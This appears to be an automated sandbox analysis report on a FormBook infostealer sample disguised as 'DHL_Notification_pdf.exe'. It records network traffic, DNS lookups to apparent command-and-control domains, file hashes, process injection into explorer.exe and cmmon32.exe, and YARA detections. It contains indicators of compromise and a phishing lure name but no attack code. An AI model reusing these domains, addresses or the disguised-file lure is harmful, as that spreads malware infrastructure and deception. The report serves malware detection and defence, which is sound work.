                                                    Snort IDS Alerts

                                                    TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                    192.168.2.78.8.8.850513532023883 03/20/23-11:29:43.795616UDP2023883ET DNS Query to a *.top domain - Likely Hostile5051353192.168.2.78.8.8.8

                                                    Network Port Distribution

                                                    TCP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 20, 2023 11:28:47.445717096 CET4970280192.168.2.71.13.186.125
                                                    Mar 20, 2023 11:28:50.459781885 CET4970280192.168.2.71.13.186.125
                                                    Mar 20, 2023 11:28:56.460304022 CET4970280192.168.2.71.13.186.125
                                                    Mar 20, 2023 11:29:10.232919931 CET4970380192.168.2.71.13.186.125
                                                    Mar 20, 2023 11:29:13.243027925 CET4970380192.168.2.71.13.186.125
                                                    Mar 20, 2023 11:29:16.992034912 CET4970480192.168.2.7198.46.160.97
                                                    Mar 20, 2023 11:29:17.113477945 CET8049704198.46.160.97192.168.2.7
                                                    Mar 20, 2023 11:29:17.113718033 CET4970480192.168.2.7198.46.160.97
                                                    Mar 20, 2023 11:29:17.113889933 CET4970480192.168.2.7198.46.160.97
                                                    Mar 20, 2023 11:29:17.235318899 CET8049704198.46.160.97192.168.2.7
                                                    Mar 20, 2023 11:29:17.235604048 CET8049704198.46.160.97192.168.2.7
                                                    Mar 20, 2023 11:29:17.235634089 CET8049704198.46.160.97192.168.2.7
                                                    Mar 20, 2023 11:29:17.235824108 CET4970480192.168.2.7198.46.160.97
                                                    Mar 20, 2023 11:29:17.235997915 CET4970480192.168.2.7198.46.160.97
                                                    Mar 20, 2023 11:29:17.357302904 CET8049704198.46.160.97192.168.2.7
                                                    Mar 20, 2023 11:29:19.259192944 CET4970380192.168.2.71.13.186.125
                                                    Mar 20, 2023 11:29:22.527839899 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:22.803483963 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:22.803628922 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:22.803774118 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.079303980 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.119358063 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407063007 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407105923 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407131910 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407161951 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407191038 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407196999 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.407217026 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407244921 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407264948 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.407269955 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407298088 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407324076 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.407330990 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.407362938 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.407388926 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.682904005 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.682940960 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.682967901 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.682996035 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683026075 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683053017 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683075905 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.683082104 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683108091 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683132887 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683157921 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683182955 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683187962 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.683187962 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.683211088 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683228970 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683242083 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.683258057 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683273077 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.683300972 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683331966 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.683339119 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683373928 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683398008 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.683401108 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683425903 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.683479071 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.958991051 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959032059 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959053040 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959073067 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959094048 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959114075 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959135056 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959157944 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959163904 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.959177971 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959197998 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959218025 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959237099 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.959239006 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959259033 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959268093 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.959280968 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959300995 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959311008 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.959321976 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959353924 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959366083 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.959374905 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959393978 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.959394932 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959415913 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959438086 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959456921 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.959458113 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959480047 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959494114 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959506989 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959526062 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959533930 CET4970580192.168.2.7219.94.129.181
                                                    Mar 20, 2023 11:29:23.959547043 CET8049705219.94.129.181192.168.2.7
                                                    Mar 20, 2023 11:29:23.959559917 CET8049705219.94.129.181192.168.2.7

                                                    UDP Packets

                                                    TimestampSource PortDest PortSource IPDest IP
                                                    Mar 20, 2023 11:28:47.359352112 CET5658853192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:28:47.383311033 CET53565888.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:29:10.199090004 CET6032653192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:29:10.222804070 CET53603268.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:29:16.961611032 CET5083553192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:29:16.990191936 CET53508358.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:29:22.251379967 CET5050553192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:29:22.526632071 CET53505058.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:29:31.374200106 CET6117853192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:29:31.394165993 CET53611788.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:29:32.418570995 CET6392653192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:29:32.440613031 CET53639268.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:29:37.463385105 CET5333653192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:29:37.600847006 CET53533368.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:29:38.619600058 CET5100753192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:29:38.787115097 CET53510078.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:29:43.795615911 CET5051353192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:29:43.897444963 CET53505138.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:29:56.792202950 CET6076553192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:29:56.933132887 CET53607658.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:30:05.017503023 CET5828353192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:30:05.039990902 CET53582838.8.8.8192.168.2.7
                                                    Mar 20, 2023 11:30:12.980236053 CET5002453192.168.2.78.8.8.8
                                                    Mar 20, 2023 11:30:13.238567114 CET53500248.8.8.8192.168.2.7

                                                    DNS Queries

                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                    Mar 20, 2023 11:28:47.359352112 CET192.168.2.78.8.8.80x130aStandard query (0)www.yongleproducts.comA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:10.199090004 CET192.168.2.78.8.8.80xab4bStandard query (0)www.yongleproducts.comA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:16.961611032 CET192.168.2.78.8.8.80xcde2Standard query (0)www.0dhy.xyzA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:22.251379967 CET192.168.2.78.8.8.80xf8f6Standard query (0)www.kunimi.orgA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:31.374200106 CET192.168.2.78.8.8.80x6e51Standard query (0)www.amirah.cfdA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:32.418570995 CET192.168.2.78.8.8.80x5c46Standard query (0)www.amirah.cfdA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:37.463385105 CET192.168.2.78.8.8.80xad3cStandard query (0)www.bisarropainting.comA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:38.619600058 CET192.168.2.78.8.8.80xd44dStandard query (0)www.bisarropainting.comA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:43.795615911 CET192.168.2.78.8.8.80x217eStandard query (0)www.traindic.topA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:56.792202950 CET192.168.2.78.8.8.80xd494Standard query (0)www.bohndigitaltech.comA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:30:05.017503023 CET192.168.2.78.8.8.80xf4bdStandard query (0)www.rifleroofers.comA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:30:12.980236053 CET192.168.2.78.8.8.80x89bdStandard query (0)www.denko-kosan.comA (IP address)IN (0x0001)false

                                                    DNS Answers

                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                    Mar 20, 2023 11:28:47.383311033 CET8.8.8.8192.168.2.70x130aNo error (0)www.yongleproducts.com1.13.186.125A (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:10.222804070 CET8.8.8.8192.168.2.70xab4bNo error (0)www.yongleproducts.com1.13.186.125A (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:16.990191936 CET8.8.8.8192.168.2.70xcde2No error (0)www.0dhy.xyz198.46.160.97A (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:22.526632071 CET8.8.8.8192.168.2.70xf8f6No error (0)www.kunimi.orgkunimi.orgCNAME (Canonical name)IN (0x0001)false
                                                    Mar 20, 2023 11:29:22.526632071 CET8.8.8.8192.168.2.70xf8f6No error (0)kunimi.org219.94.129.181A (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:31.394165993 CET8.8.8.8192.168.2.70x6e51Name error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:32.440613031 CET8.8.8.8192.168.2.70x5c46Name error (3)www.amirah.cfdnonenoneA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:37.600847006 CET8.8.8.8192.168.2.70xad3cName error (3)www.bisarropainting.comnonenoneA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:38.787115097 CET8.8.8.8192.168.2.70xd44dName error (3)www.bisarropainting.comnonenoneA (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:43.897444963 CET8.8.8.8192.168.2.70x217eNo error (0)www.traindic.top162.0.231.77A (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:29:56.933132887 CET8.8.8.8192.168.2.70xd494No error (0)www.bohndigitaltech.combohndigitaltech.comCNAME (Canonical name)IN (0x0001)false
                                                    Mar 20, 2023 11:29:56.933132887 CET8.8.8.8192.168.2.70xd494No error (0)bohndigitaltech.com162.241.24.110A (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:30:05.039990902 CET8.8.8.8192.168.2.70xf4bdNo error (0)www.rifleroofers.comrifleroofers.comCNAME (Canonical name)IN (0x0001)false
                                                    Mar 20, 2023 11:30:05.039990902 CET8.8.8.8192.168.2.70xf4bdNo error (0)rifleroofers.com67.222.24.48A (IP address)IN (0x0001)false
                                                    Mar 20, 2023 11:30:13.238567114 CET8.8.8.8192.168.2.70x89bdNo error (0)www.denko-kosan.comdenko-kosan.comCNAME (Canonical name)IN (0x0001)false
                                                    Mar 20, 2023 11:30:13.238567114 CET8.8.8.8192.168.2.70x89bdNo error (0)denko-kosan.com49.212.180.95A (IP address)IN (0x0001)false

                                                    HTTP Request Dependency Graph

                                                    • www.0dhy.xyz
                                                    • www.kunimi.org
                                                    • www.traindic.top
                                                    • www.bohndigitaltech.com
                                                    • www.rifleroofers.com
                                                    • www.denko-kosan.com

                                                    Statistics

                                                    Behavior

                                                    Click to jump to process

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:11:28:11
                                                    Start date:20/03/2023
                                                    Path:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user\Desktop\DHL_Notification_pdf.exe
                                                    Imagebase:0x400000
                                                    File size:299346 bytes
                                                    MD5 hash:06F7894017E8F6737D228ADC14480C83
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low

                                                    General

                                                    Target ID:1
                                                    Start time:11:28:11
                                                    Start date:20/03/2023
                                                    Path:C:\Users\user\AppData\Local\Temp\ldndbi.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user~1\AppData\Local\Temp\ldndbi.exe" C:\Users\user~1\AppData\Local\Temp\qlqjt.de
                                                    Imagebase:0x400000
                                                    File size:95744 bytes
                                                    MD5 hash:C99B9B59B44F7789DD46E5230C22A9CD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Antivirus matches:
                                                    • Detection: 19%, ReversingLabs
                                                    Reputation:low

                                                    General

                                                    Target ID:2
                                                    Start time:11:28:12
                                                    Start date:20/03/2023
                                                    Path:C:\Windows\System32\conhost.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                    Imagebase:0x7ff6edaf0000
                                                    File size:625664 bytes
                                                    MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:3
                                                    Start time:11:28:13
                                                    Start date:20/03/2023
                                                    Path:C:\Users\user\AppData\Local\Temp\ldndbi.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Users\user~1\AppData\Local\Temp\ldndbi.exe
                                                    Imagebase:0x400000
                                                    File size:95744 bytes
                                                    MD5 hash:C99B9B59B44F7789DD46E5230C22A9CD
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.290138385.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.290222663.0000000000490000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.292007151.0000000000D20000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:low

                                                    General

                                                    Target ID:4
                                                    Start time:11:28:18
                                                    Start date:20/03/2023
                                                    Path:C:\Windows\explorer.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\Explorer.EXE
                                                    Imagebase:0x7ff75ed40000
                                                    File size:3933184 bytes
                                                    MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high

                                                    General

                                                    Target ID:5
                                                    Start time:11:28:31
                                                    Start date:20/03/2023
                                                    Path:C:\Windows\SysWOW64\cmmon32.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                    Imagebase:0x1200000
                                                    File size:36864 bytes
                                                    MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                    Has elevated privileges:false
                                                    Has administrator privileges:false
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.508997363.0000000000E50000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.508740330.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                    • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.509702408.00000000011A0000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                    Reputation:high

                                                    Disassembly

                                                    No disassembly